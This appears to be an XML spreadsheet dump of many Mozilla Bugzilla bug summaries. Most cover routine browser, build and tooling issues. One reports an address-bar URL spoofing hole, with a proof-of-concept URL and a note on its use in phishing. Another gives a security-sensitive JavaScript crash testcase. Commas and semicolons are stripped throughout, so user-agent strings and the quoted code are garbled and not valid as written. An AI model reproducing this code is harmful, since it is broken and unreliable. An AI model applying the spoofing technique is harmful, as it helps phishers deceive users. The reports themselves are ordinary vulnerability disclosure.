    <t>CORE-450369</t>
  </si>
  <si>
    <t>TM: json2.js crashes in nanojit</t>
  </si>
  <si>
    <t>Created attachment 333518
gdb debug spew and backtrace
David we need your nj expertise. See attachment for skidmarks. Self-testing json2.js in second attachment.
/be</t>
  </si>
  <si>
    <t>BUGZILLA-28624</t>
  </si>
  <si>
    <t>Email Settings config page inaccurate</t>
  </si>
  <si>
    <t>The Email Settings configuration page says that email is sent to the reporter
and a few other people but does not list the voters. I noticed that email is
also sent to voters. Please add voters to that info/setting page. Thanks.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-390775</t>
  </si>
  <si>
    <t>rw / Kinyarwanda</t>
  </si>
  <si>
    <t>Land Kinyarwanda Firefox localization on trunk and prepare for branching</t>
  </si>
  <si>
    <t>I did the initial landing for the Kinyarwanda localization of Firefox on the trunk as per bug 330026.
There is some work left to do a few bugs in the localization itself as well as the productization and the in-product webpages.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-450324</t>
  </si>
  <si>
    <t>Order 8GB RAM for mrapp51/mrapp52</t>
  </si>
  <si>
    <t>mrapp51 and mrapp52 run Bugzilla and each needs to be brought up to 8GB of RAM to handle the memory usage requirements of mod_perl more efficiently.</t>
  </si>
  <si>
    <t>DIRECTORY-138612</t>
  </si>
  <si>
    <t>should use gethostbyname_r() on Linux</t>
  </si>
  <si>
    <t>Recent versions of glibc have gethostbyname_r() but libldap uses
gethostbyname() instead (which is not thread safe). LDAP clients that use
libprldap directly or indirectly (via libssldap) are thread safe because
libprldap arranges for the NSPR PR_GetIPNodeByName() function to be used.</t>
  </si>
  <si>
    <t>CORE-459780</t>
  </si>
  <si>
    <t>X11 event compression isn't handling extension events on maemo</t>
  </si>
  <si>
    <t>Created attachment 342997
use gdk_event_peek/gdk_event_get instead of Xlib.  also clean up some duplicated code.
the maemo gtk patches always turn on extension events which means the X11 MotionNotify compression (from bug 459532) wasn't actually removing any of the motion events from the queue.
A more proper fix for this is to get the events from gdk not from Xlib since gdk will take care of all the extension events for us and map them to GdkMotionEvent's thereby opening them up to compression along with normal motion events.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-331166</t>
  </si>
  <si>
    <t>attach a session id to all events</t>
  </si>
  <si>
    <t>We need to keep a session id that increments each time the browser is started to provide a context for DOM window ids (which count from 0 in each new session).</t>
  </si>
  <si>
    <t>MOZILLA.ORG-458832</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Austin King </t>
  </si>
  <si>
    <t>Austin needs access to SVN and needs to be added to the webdev-tools group.
He has filled out a form giving it to Erica right now.</t>
  </si>
  <si>
    <t>CORE-200382</t>
  </si>
  <si>
    <t>Reduce content's dependencies on webshell</t>
  </si>
  <si>
    <t>This is follow up work to bug 191023 which cleaned webshell references from HTML
document. I started out cleaning XML but it went further and now the only part
remaining is printing which I want to leave outside the scope of this bug. Also
there is the Makefile dependencies which should be another bug (although most of
content no longer uses nsIWebShell we still use nsILinkHandler etc. which live
in webshell).</t>
  </si>
  <si>
    <t>CORE-782227</t>
  </si>
  <si>
    <t>Add a todo() when there is no invalid form submission observer (content/ tests)</t>
  </si>
  <si>
    <t>Created attachment 651307
Patch
Back in the days a test with no test was automatically a todo. Nowadays I think it's a failure. This might fix bug 781533.</t>
  </si>
  <si>
    <t>FIREFOX-506132</t>
  </si>
  <si>
    <t>write session data to disk less often in WinCE</t>
  </si>
  <si>
    <t>THUNDERBIRD-382064</t>
  </si>
  <si>
    <t>Remove support for nsIMsgStringService</t>
  </si>
  <si>
    <t>Instead of updating this interface we should just get rid of it and go through the string bundle service directly. I think we invented this service back in the day when string bundles weren't being cached. Most of the mailnews code already uses string bundles directly but some code in local and compose go through this intermediary service.</t>
  </si>
  <si>
    <t>BUGZILLA-79730</t>
  </si>
  <si>
    <t>Minor minor typo in move.pl</t>
  </si>
  <si>
    <t>Apologies for being so pedantic...
see patch (recieve -&gt; receive)</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-406878</t>
  </si>
  <si>
    <t>increase built in talos timeout per test to 8 hours</t>
  </si>
  <si>
    <t>Created attachment 291545
increase timeout
We are still getting timeouts on some of our tests and it is hitting the talos timeout before the buildbot timeout - this patch just increases the talos timeout to be more in line with buildbot.</t>
  </si>
  <si>
    <t>FIREFOX-407366</t>
  </si>
  <si>
    <t>Require   for the keyword field when keyword searches are created.</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U Intel Mac OS X 10.4 en-US rv:1.9b2pre) Gecko/2007120604 Minefield/3.0b2pre
STR:
1. visit www.google.com
2. Context click the search field
3. Select  Add a Keyword for this Search...
4. In the resulting Add Bookmark dialog: Give it a unique name Gookey
5. Leave the Keyword: field empty
6. Click Add
7. In the location bar type a search term
Tested results:  
As expected because of the blank keyword we get a google search result.
Expected result:
Do not allow the keyword search bookmark to be added with an empty keyword field.
dietrich suggested a few things in irc:
dietrich&gt;	tracy: yes. i think at the least we should require a keyword when opening the ui via that context menu item if only to reduce confusion.
[11:16]		we might even want keyword as the only text input in the UI for that also
[11:17]		hm i also think we need some contextual help - normal users probably don't even know wth that is assuming they ever find that context menu option
[11:17]		dietrich how would the keyword search bookmark get named then? by title?
[11:18]		tracy: yeah page title
[11:19]		dietrcih. so what if the user has google bookmarked and then also keyworded search bookmarks google...they'd both be the same name? I think the user should be able to uniquely name the search at it's creation.
[11:19]		tracy: yeah good point. maybe keyword should just be first in the UI then
[11:20]		the focus should be on the keyword creation</t>
  </si>
  <si>
    <t>DATA_PLATFORM_AND_TOOLS-887941</t>
  </si>
  <si>
    <t>Telemetry Dashboards (TMO)</t>
  </si>
  <si>
    <t>DATA_PLATFORM_AND_TOOLS</t>
  </si>
  <si>
    <t>Backfill 1 week of data</t>
  </si>
  <si>
    <t>I would like to start by having a full telemetry dataset for the current dev releases.
It would also be good to default filters to nightly ## where ## is the highest number we have for nightly.</t>
  </si>
  <si>
    <t>chris.lonnen</t>
  </si>
  <si>
    <t>MOZILLA_LABS-492725</t>
  </si>
  <si>
    <t>make chrome-based website authenticator use core Firefox form fill notifications</t>
  </si>
  <si>
    <t>Created attachment 377121
patch v1: removes code copied from login manager
Currently the chrome-based website authenticator uses a bunch of code copied over from the login manager.  In bug 492153 I'm working on making the login manager notify observers when it finds logins for a form which would obviate the need for Weave to include the copied code.  Weave should switch to the notification once that bug is fixed.
Here's a patch that seems to work against a copy of Firefox with my latest patch in bug 492153.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-629263</t>
  </si>
  <si>
    <t>[Tracking bug] Make Jetpack-sdk meet the requirements for unhiding on TBPL</t>
  </si>
  <si>
    <t>Discovered that jetpack has moved to using another repo when we disabled the jetpack tests that were hanging our test slaves and taking down the entire win7 pool.
Now that bug#627604 is fixed we are now testing the code in the new jetpack-sdk repo. Since turning this on yesterday the tests are failing. It looks like the failures are not setup failures. Instead it looks like these failures are caused by regressions introduced sometime between when the repos moved (~1st-15th Dec 2010) and today (26 Jan 2011)
Using http://tree.mozilla.org/?noignore=1 you can see the failing Jp tests on mozilla-central and on Tryserver. Once all these are passing green (depbugs filed to track specific test failures) then this bug is to track enabling the Jp test suite on tinderbox/tbpl.</t>
  </si>
  <si>
    <t>hwine</t>
  </si>
  <si>
    <t>FIREFOX-503734</t>
  </si>
  <si>
    <t>MAX_HISTORY_MENU_ITEMS and GLUE_CID shouldn't be defined globally</t>
  </si>
  <si>
    <t>Created attachment 388119
patch
random browser.js cleanup...</t>
  </si>
  <si>
    <t>FIREFOX-271022</t>
  </si>
  <si>
    <t>JavaScript Console Error: Opening Non-Sidebar Windows in the Sidebar (searchBox has no properties)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
If a window from an extension (or from a browser window that cannot be opened
from the sidebar without a specific extension) is opened in the sidebar an
error will show up in the JavaScript Console.  I have noticed this both in my
current profile and in a new one.  You may need to set
javascript.options.showInConsole to true in about:config for this to show up.
The error is as follows:
Error: searchBox has no properties
Source File: chrome://browser/content/browser.js
Line: 3330
And the line is:
searchBox.focus()
Reproducible: Always
Steps to Reproduce:
1. Install an extension which allows you to open up a window in the sidebar
(Download Manager Tweak EMButtons QuickNote etc.).
2. If not set up to do so by default set up the extension to open up a window
in the sidebar.
3. Open up the window affected by the extension which should now open up in the
sidebar.
Actual Results:  
The error mentioned above is generated in the JavaScript Console.
Expected Results:  
The error mentioned above should not be generated at all.</t>
  </si>
  <si>
    <t>73kbq4e02</t>
  </si>
  <si>
    <t>NSS-95311</t>
  </si>
  <si>
    <t>SEC_ASN1DecodeItem asserts when decoding SPKI</t>
  </si>
  <si>
    <t>SECKEY_ImportDERPublicKey expects a raw DER-encoded public key. If you instead
give it a DER-encoded SubjectPublicKeyInfo the ASN1 decoder asserts. I will
attach a simple program to reproduce the error.</t>
  </si>
  <si>
    <t>CORE-249322</t>
  </si>
  <si>
    <t>multiline urls in address bar allow spoofing</t>
  </si>
  <si>
    <t>noys@bigpond.com reported this bug to security@mozilla.org.  It's a known bug
(bug 77932) but noys@bigpond.com was the first to identify it as a security
hole and provide an exploit.
The rest of this bug report is pasted from the e-mail from noys@bigpond.com.
Versions effected:
==================
Confirmed in:
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040615 Firefox/0.9
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040207 Firefox/0.8
Thought to be vulnerable:
Other versions of Mozilla on Linux
Summary:
========
URL Obfuscation possible when multiline URL pasted into Firefox address Bar.
Details:
========
When a multiline URL is pasted into the address bar the whole URL is
evaluated and loaded by Firefox but only the first line of the URL is
displayed in the address line.  I have verified this bug in Firefox 0.8
and 0.9 on Linux.
Reproducibility:
================
Every time
Steps to Reproduce:
===================
1. Type a multiline URL into a text editor
2. Copy the URL into the clipboard
3. Paste the URL into the address bar and press enter.
Actual Results:
===============
The URL is loaded in it'e entirety but anything after the first pasted
newline is not displayed.
Expected Results:
=================
The Software should either drop anything after the first newline or
strip newline characters out of the URL and display the whole lone URL.
Additional Information:
========================
- - The additional lines of the pasted URL remain hidden in the address
bar when you click in it and type a new URL.
- - This issue has implications in phishing scams as obfuscation of the
real hostname is possible when used in conjuction with a malicious site
that utilises wildcard DNS configurations (e-gold is just an example of
a DNS domain that was used in Jelmer's recent COELOCANTH experiments
with MSIE.  See Bugtraq for more information).
To test paste the URL inbetween the -- characters into the address bar
in firefox on Linux.
- --
http://www.google.com
\www.e-gold.com/
- --
A screenshot is available at
http://users.bigpond.com/blurred.vision/firefox3.png.
Severity:
=========
Allows obfuscation of the real hostname being accessed.  Phishing scam
friendly.  Injection most likely possible if newline chars are URL
encoded in a standard HTTP link (untested).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-431657</t>
  </si>
  <si>
    <t>in the name of saving disk space mozilla2 buildbot nightlies should delete their trees at the end of a build</t>
  </si>
  <si>
    <t>As we add more branches to the Mozilla2 Buildbot disk space on the slaves is going to become a larger issue. Currently we keep 2 trees for each branch one for dep builds one for nightlies. (At some point we should look at having nightly builds done off of the dep builder but that's a much bigger issue.) We can easily save a bunch of disk space by simply having the nightly builder clobber its build directory (tree + symbol directories) after uploading the build symbols etc. 
IIRC it used to be a big deal to keep thy symbol directories around on fx-win32-tbox but I'm not sure if this has changed with the symbol server. CC'ing folks in case there's objections.</t>
  </si>
  <si>
    <t>CALENDAR-392028</t>
  </si>
  <si>
    <t>Get/Set Calendar prefs from Google (color title etc)</t>
  </si>
  <si>
    <t>Google now allows setting calendar prefs through the allcalendars and owncalendars feeds.
Unfortunatly there are still restrictions. The possible colors that can be set are:
[
  . // 0 reserverd
  '#A32929'
  '#B1365F'
  '#7A367A'
  '#5229A3'
  '#29527A'
  '#2952A3'
  '#1B887A'
  '#28754E'
  '#0D7813'
  '#528800'
  '#88880E'
  '#AB8B00'
  '#BE6D00'
  '#B1440E'
  '#865A5A'
  '#705770'
  '#4E5D6C'
  '#5A6986'
  '#4A716C'
  '#6E6E41'
  '#8D6F47'
] 
It is therefore required to either use a custom color picker or to use the nearest color.
Some changes to the calendar properties dialog might also be a NTH for this bug. See bug 391204.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-519732</t>
  </si>
  <si>
    <t>Unthrottle FF3.0.15-to-3.5.5 major update</t>
  </si>
  <si>
    <t>We have *throttled* FF3.0.14-to-3.5.3 Major Update available for users who manually CheckForUpdates. According to the schedule (http://wiki.mozilla.org/Releases) we were planning to unthrottle that major update today and prompt users. 
Per emails this might be postponed. Filing this bug to track.</t>
  </si>
  <si>
    <t>CORE-325336</t>
  </si>
  <si>
    <t>implement better window/sheet support in Cocoa widgets</t>
  </si>
  <si>
    <t>We have pretty bad window/sheet support in Cocoa widgets (actually no sheet support at all). This is a general bug for patches to improve the situation and should probably be closed when we have basic support for sheets and a working window situation.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-245574</t>
  </si>
  <si>
    <t>tinderbox should re-read configuration in each cycle</t>
  </si>
  <si>
    <t>it would be nice if tinderbox would read tinder-config.pl at the start of each
cycle so that restarting it explicitly is not necessary.</t>
  </si>
  <si>
    <t>CORE-57728</t>
  </si>
  <si>
    <t>Spacebar when image button has focus still scrolls page</t>
  </si>
  <si>
    <t>We forgot input type=image for bug 53896 will attach a patch.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-314005</t>
  </si>
  <si>
    <t>Search engine list approval for Czech FF 1.5</t>
  </si>
  <si>
    <t>Requesting approval of folowing search engine list:
google ... The original Google SE no Google in Czech
jyxo-cz ... Czech search engine with best results for Czech language capable of all its gramatical strangeness like inflection genders gramatical cases ... 
centrum-cz ... Yahoo like portal
mall-cz ... the main online shop in Czech republic.
seznam-cz ... Yahoo like portal
slunecnice-cz ... Czech free software repository
This plugin list is identical to the plugin list that was approved for FF 1.0 (minus the name changes) in bug 265160 where you can also find more detailed description and reasons.</t>
  </si>
  <si>
    <t>rebron</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-482463</t>
  </si>
  <si>
    <t>Consistent timeout failures on unit tests early in the mornings</t>
  </si>
  <si>
    <t>I usually look at tinderbox at about 5-6am Pacific for the first time in the morning and every day the last several cycles of unit tests are orange with various timeout-related oranges.  A sampling from today (ignoring the orange caused by actual code changes):
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output killing pid 27909
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output killing pid 30167
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output
(That's all three of the unit test cycles that tested rev 1d032a7fd91a on m-c).
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output killing pid 15844
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output killing pid 50401
(two of three unit test cycles testing rev 3b40510faeff on m-c)
*** 42317 ERROR TEST-UNEXPECTED-FAIL | /tests/intl/uconv/tests/test_unicode_noncharacters_gb18030.html | Error thrown during test: $(display) is null - got 0 expected 1
*** 42320 ERROR TEST-UNEXPECTED-FAIL | /tests/intl/uconv/tests/test_unicode_noncharacters_utf8.html | Error thrown during test: $(display) is null - got 0 expected 1
(this is due to it taking the test machine more than 100ms to parse a  an  with a bit of text in it and a  with that ID).
Is there something going on that makes load go through the roof on the unit test machines sometime between 23:00 and 04:00 pacific?  It'd be really nice to fix it whatever it is...</t>
  </si>
  <si>
    <t>SEAMONKEY-225490</t>
  </si>
  <si>
    <t>netscape search plugin (mozilla's default) is no longer functioning. search is broken</t>
  </si>
  <si>
    <t>Mozilla's search feature defaults to Netscape's search engine which no longer
functions. This smoketest failure needs to be fixed preferably by switching the
default search engine to Google. 
The URLbar search the sidebar search and the context menu search items all
fail to return results. 
Workaround: switch to a different search engine.</t>
  </si>
  <si>
    <t>search</t>
  </si>
  <si>
    <t>CORE-86586</t>
  </si>
  <si>
    <t>Get/SetBidiProperty problems</t>
  </si>
  <si>
    <t>spin off from bug 84031:
A few other notes looking at related code (although you don't need to fix these
now):
 * The implementations of [Get/Set]BidiProperty in nsFrame.cpp should be
declared NS_IMETHODIMP rather than nsresult.
 * All 3 declarations of SetBidiProperty should probably not be |const|.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-396953</t>
  </si>
  <si>
    <t>update the vista test ref platform documentation</t>
  </si>
  <si>
    <t>The reference platform documentation at http://wiki.mozilla.org/ReferencePlatforms/Test/Vista needs to be updated.</t>
  </si>
  <si>
    <t>CORE-414654</t>
  </si>
  <si>
    <t>Accessibles not hidden for visibility:hidden w/ position:absolute</t>
  </si>
  <si>
    <t>Created attachment 300108
Testcase
When an object has visibility: hidden it normally does not get an accessible created for it.
However if position: absolute is also used then we are creating an accessible.
This is because we get PR_TRUE returned from
frame-&gt;GetStyleVisibility()-&gt;IsVisible()
Robert do you know if that is intentional?</t>
  </si>
  <si>
    <t>BUGZILLA-365129</t>
  </si>
  <si>
    <t>When moving a bug to another product and the target product has only one component version or target milestone automatically select them instead of throwing an error</t>
  </si>
  <si>
    <t>When I change a bug's product and I forget to select a version from the list I get:
Bugzilla has suffered an internal error. Please save this page and send it to bugzilla-admin@mozilla.org with details of what you were doing at the time this message appeared.
URL: https://bugzilla.mozilla.org/process_bug.cgi
Form field version was not defined.</t>
  </si>
  <si>
    <t>CORE-461050</t>
  </si>
  <si>
    <t>Implement regular expressions by compiling to native code</t>
  </si>
  <si>
    <t>The idea is to compile SpiderMonkey regular expression ASTs to nanojit LIR and then let nanojit compile to native code. This will enable compilation of regular expressions on all nanojit platforms.</t>
  </si>
  <si>
    <t>FIREFOX-255963</t>
  </si>
  <si>
    <t>mozilla crashed when i choose some item from autocompletetion offer list after I pressed enter on two entered words from this list</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
mozilla crashed when i choose some item from autocompletetion offer list after
I pressed enter on two entered words from this list. On next web page which is
loaded is autocompletetion box still visible ! and I can choose one of the
item which is offered. Than browser crashed. It's everywhere on www.google.com
too...
Reproducible: Always
Steps to Reproduce:
1. open web www.google.com
2. enter some two words of text you want to search and which you have search
some time before.
3. browser offers you list box with some possilble words you can enter easyly
(autocompletetion)
4. you don't choose any of the item rom list but only press enter
5. google produce result page but on this page is autocompletetion list box
still visible
6. if you now choose some item browser crashed everytime
Actual Results:  
browser crashed everytime</t>
  </si>
  <si>
    <t>zuchy</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-160760</t>
  </si>
  <si>
    <t>topbar logo changing background</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 ro-Ro rv:1.1b) Gecko/20020721
BuildID:    2002072104
Go with the mouse over the Mozilla logo in the top of the page. The right side
of the image will change backgroung when the mouse is over the logo.
I traced the problem to the following rule in the W3C-REC.css file:
@media screen {  
a[href]:hover { background: #ffa }
}
this rule is causing the background to change.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.mozilla.org/docs/web-developer/bugspecs/REC-CSS1.html
2. Go with the mouse over the logo at the top of the page
3.</t>
  </si>
  <si>
    <t>macarie.neculai</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-447803</t>
  </si>
  <si>
    <t>Spelling mistake in description of platform keyword</t>
  </si>
  <si>
    <t>Trivial but it annoys me :-)
In the description of the platform keyword:
s/effect/affect
http://www.wsu.edu/~brians/errors/affect.html</t>
  </si>
  <si>
    <t>cutchy11+bugzilla</t>
  </si>
  <si>
    <t>CORE-523530</t>
  </si>
  <si>
    <t>Crash [@ 0x001f5422] or [@ 0x002dd7e1]</t>
  </si>
  <si>
    <t>try { (function() {
    [__defineSetter__(x gc)]
    })()
} catch(e) {}
try { (function() {
        __defineGetter__(x gc).x
    })()
} catch(e) {}
try { (function() {
        for (var a = 0 a &lt; 8 ++a) {
            if (a % 3 == 1) {
                this.watch(x eval)
            }
        }
    })()
} catch(e) {}
try { (function() {
        for (let b = 0 b &lt; 4 ++b) print(x = 3 / 0)
    })()
} catch(e) {}
crashes js opt shell without -j at 0x001f5422 and crashes dbg shell without -j at 0x002dd7e1 when passed in as a CLI argument. Setting security-sensitive due to scary addresses. autoBisect coming right up...</t>
  </si>
  <si>
    <t>nth10sd</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-244926</t>
  </si>
  <si>
    <t>[FIX]mailto protocol is not worked when using external mailer</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040527
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a2) Gecko/20040527
When I click the link of mailto protocol Mozilla said mailto is not a
registerd protocol.
However In the case of normal setting this problem does not reproduce.
This problem is only reproduced when having
'user_pref(network.protocol-handler.external.mailto true)'.
Reproducible: Always
Steps to Reproduce:
1. Create a new profile.
2. Add a [New] -&gt; [Boolean] in about:config.
3. Enter network.protocol-handler.external.mailto to the preference name
   and its value set to true.
4. Click the any link that is mailto protocol.
Actual Results:  
Mozilla said mailto is not a registerd protocol.
And external mailer was not launched.
Expected Results:  
External mailer should be luaunched.
This problem is reproduced on trunk only
it works fine on 1.7 branch.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-318221</t>
  </si>
  <si>
    <t>rightmost breadcrumb broken on non-default mozilla.com pages</t>
  </si>
  <si>
    <t>mozilla.com pages include breadcrumbs generated by mozilla-com/lib/breadcrumbs.tmpl.  That template uses the MetaExtractor's getRelativePath function to muck with the URLs for pages in the breadcrumbs.
It looks like getRelativePath just chops index.html off paths that end with index.html and .html off other paths which would be great if we had MultiViews turned on for mozilla.com but we have MultiViews turned off for that site so getRelativePath creates URLs that don't exist i.e. broken links especially for non-default pages like /firefox/tabs.html.
I suppose we don't want to turn MultiViews on so the alternative is to not call getRelativePath in which case we don't need to use the MetaExtractor for breadcrumbs at all.</t>
  </si>
  <si>
    <t>CORE-430926</t>
  </si>
  <si>
    <t>Tab character displayed almost invisibly thin</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
In the code block seen at this bug's URL Firefox tries to align the second parameter of $sequence (penultimate line) with the parameters of the commands above it causing it to crash into its first parameter ('idle').
Reproducible: Always
Steps to Reproduce:
1. Visit bug URL
2. Observe penultimate line of code block
3. Compare to View Source rendering
Actual Results:  
Tab character between 'idle' and 'myfirstmodel-idle.smd' is almost invisible.
Expected Results:  
Tab character aligns 'myfirstmodel-idle.smd' somewhere further to the right creating a visual space between it and 'idle'.
Bug only affects monospace fonts.</t>
  </si>
  <si>
    <t>t_edwards</t>
  </si>
  <si>
    <t>CORE-370430</t>
  </si>
  <si>
    <t>[FIX]Adding or removing noframes element causes flashing</t>
  </si>
  <si>
    <t>Created attachment 255132
testcase
See testcase the page should not flash but does in current builds (also on branch).
This regressed between 2005-09-05 and 2005-09-06 I think a regression from bug 306660.
Basically the flashing happens when I add or remove the  element from the frameset page.
I'm seeing this also in non-dynamic cases like at the url.</t>
  </si>
  <si>
    <t>CORE-322128</t>
  </si>
  <si>
    <t>Remove aForceType argument of LoadObject make it a capability instead</t>
  </si>
  <si>
    <t>In order to reduce the argument list of LoadObject I want to make the type overriding a class-specific property i.e. make it a flag in the GetCapabilities() bitmask.</t>
  </si>
  <si>
    <t>CORE-88864</t>
  </si>
  <si>
    <t>image layout inside table cell changes when HEIGHT/WIDTH is specified</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win98 en-US rv:0.9.2) Gecko/20010628
BuildID:    2001062815
I found this on an IBM download page and created the reduced test case at:
   http://www.ksu.edu/test/mozilla/left-right.html
The problem is that the layout changes when the HEIGHT and WIDTH attributes of
the IMG tag are used even when the height and width specified exactly match the
natural size of the image.  See the test case for more description.
Reproducible: Always
Steps to Reproduce:
1.  View test case
There are three bugs described in the test case.  The first two I presume are
really manifestations of the same problem just differing in the horizontal and
vertical dimensions.
The third problem I discovered while generating the test case but is likely
independent so I'll file a separate bug on it.
Also quirks mode is involved.  The test case has no DOCTYPE and thus Mozilla
formats it in quirks mode.  However I don't think that the layout anomolies are
intentional.  
A duplicate of the test case file with a DOCTYPE to put Mozilla into standard
mode is at:
   http://www.ksu.edu/test/mozilla/left-right-standardmode.html
Standard mode uses a different height for the rows in the first table but I
think this is intentional.  It makes it difficult to tell if there is an extra
vertical pixel or two.  The second table doesn't have additional height and
does show the extra vertical and horizontal space.
Also note that NS 4.77 IE 5.0 *and Netscape 6.0* do not show these anomolies.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-466952</t>
  </si>
  <si>
    <t>Sisyphus - JavaScript Tests - update known failures.</t>
  </si>
  <si>
    <t>Created attachment 350295
patch</t>
  </si>
  <si>
    <t>CORE-408312</t>
  </si>
  <si>
    <t>Editing Zapfino text on Windows leaves rendering artifacts</t>
  </si>
  <si>
    <t>If you install Zapfino Extra LT Pro on Windows and then load the attached testcase and then edit the text a bit you see that rendering artifacts are left behind. This is probably a glyph extents bug. The same testcase with the same font works fine on Mac.
This is unfortunate because it stuffs up typography demos.</t>
  </si>
  <si>
    <t>TESTING-372939</t>
  </si>
  <si>
    <t>mochitest gets hung up on .swp files if they are present</t>
  </si>
  <si>
    <t>I am editing test files on my intel Mac running 10.4.8. If I am actually using vi and have a file open vi writes a temporary file to the directory that my file is in.
If I am editing foo.txt it creates a temporary file named .foo.txt.swp.
If I am editing aMochiTest.html then there is a .aMochiTest.html.swp file. If I run the mochitest harness it sees the .aMochiTest.html.swp file and asks what to do with it. It cannot load it and if one hits the  button it cancels the entire mochitest run.
The server.js can be made to ignore dot files. Arguably it should.</t>
  </si>
  <si>
    <t>SEAMONKEY-246639</t>
  </si>
  <si>
    <t>Signature/Crypto status bar Icon in wrong place</t>
  </si>
  <si>
    <t>Open a received signed or encrypted email.
Expected behaviour:
  There should be a signed and/or encrypted icon appearing
  on the right hand side of the status bar.
Observed behaviour:
  The signed icon is on the wrong place
  it's at the very left of the status bar.
  And the encryption icon does not appear at all.</t>
  </si>
  <si>
    <t>CORE-820569</t>
  </si>
  <si>
    <t>BaselineCompiler: Refactor enter-IC code to be simpler.</t>
  </si>
  <si>
    <t>Created attachment 691056
Refactor IC entry code.
There's a lot of boilerplate duplication in the code that enters from mainline code (in BaselineCompiler) to an IC chain.  That can be refactored out. to be simpler.
Patch does the refactoring and some other code cleanups.</t>
  </si>
  <si>
    <t>kvijayan</t>
  </si>
  <si>
    <t>NSS-123693</t>
  </si>
  <si>
    <t>Memory leaks in the error paths in softoken/pkcs11.c PK11_SlotInit</t>
  </si>
  <si>
    <t>In mozilla/security/nss/lib/softoken/pkcs11.c function PK11_SlotInit()
if we fail in initializing any member of the PK11Slot object the
partially constructed PK11Slot object is not destroyed.  So we leak
memory in the error paths.
The best way to fix this is probably to call pk11_DestroySlotData()
before we return from PK11_SlotInit() on failure.  This may require
fixing pk11_DestroySlotData() so that it can destroy a partially
constructed PK11Slot object.</t>
  </si>
  <si>
    <t>CORE-182084</t>
  </si>
  <si>
    <t>Slider debug code is built unnecessarily</t>
  </si>
  <si>
    <t>We curently define a symbol to PR_FALSE then do a run-time check of the symbol.
 We should really only build the slider debug stuff if the symbol is set and
don't build it otherwise.  Patch coming.</t>
  </si>
  <si>
    <t>FIREFOX-243344</t>
  </si>
  <si>
    <t>Consolidate makefiles in xpfe/ and xpfe/components/</t>
  </si>
  <si>
    <t>Firefox should be able to do its component selection a la carte in
xpfe/components and NOT have the build system also autopackage all the chrome
there by using NO_DIST_INSTALL=1... also fix a confusing double negative with
MOZ_STANDALONE_NONBROWSER_XULAPP nonsense</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-426320</t>
  </si>
  <si>
    <t>nsIAbDirFactoryService::getDirFactory should take an ACString as an arg rather than a string</t>
  </si>
  <si>
    <t>Created attachment 312880
The fix
Changing nsIAbDirFactoryService::getDirFactory from a string to an ACString will save us a .get() and a nsDependentCString call plus avoiding some unnecessary checks.
Small change but good tidy up I think patch attached.</t>
  </si>
  <si>
    <t>BUGZILLA-275595</t>
  </si>
  <si>
    <t>Replace bz-devel ENTITY with a comment wrapper</t>
  </si>
  <si>
    <t>Another spinoff. Originally reported in bug 265995 is the fact that the bz-devel
ENTITY is not valid XML. Bug 273519 became the bug to remove it unconitionally
from 2.18 (as 2.18 will never again be a development version). It was also
decided over there that the new method will be:
 Devel only stuff 
So that a simple grep can find stuff that needs to be removed after branching.
Just for historical reference the bz-devel ENTITY was put in to allow for a
really quick switch of devel/release when it came to tarball a release. Because
we now branch for every release before actually doing it the ENTITY doesn't
serve as much purpose as it was intended to :).</t>
  </si>
  <si>
    <t>CORE-632476</t>
  </si>
  <si>
    <t>Handle non-finite values for fillRect strokeRect per spec</t>
  </si>
  <si>
    <t>Created attachment 510685
Patch v1</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-238590</t>
  </si>
  <si>
    <t>jumpman23.com - Bad user agent sniffing:  misdetects Firefox</t>
  </si>
  <si>
    <t>mozilla 1.0+ is supported but Firefox is blocked
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040324
Firefox/0.8.0+</t>
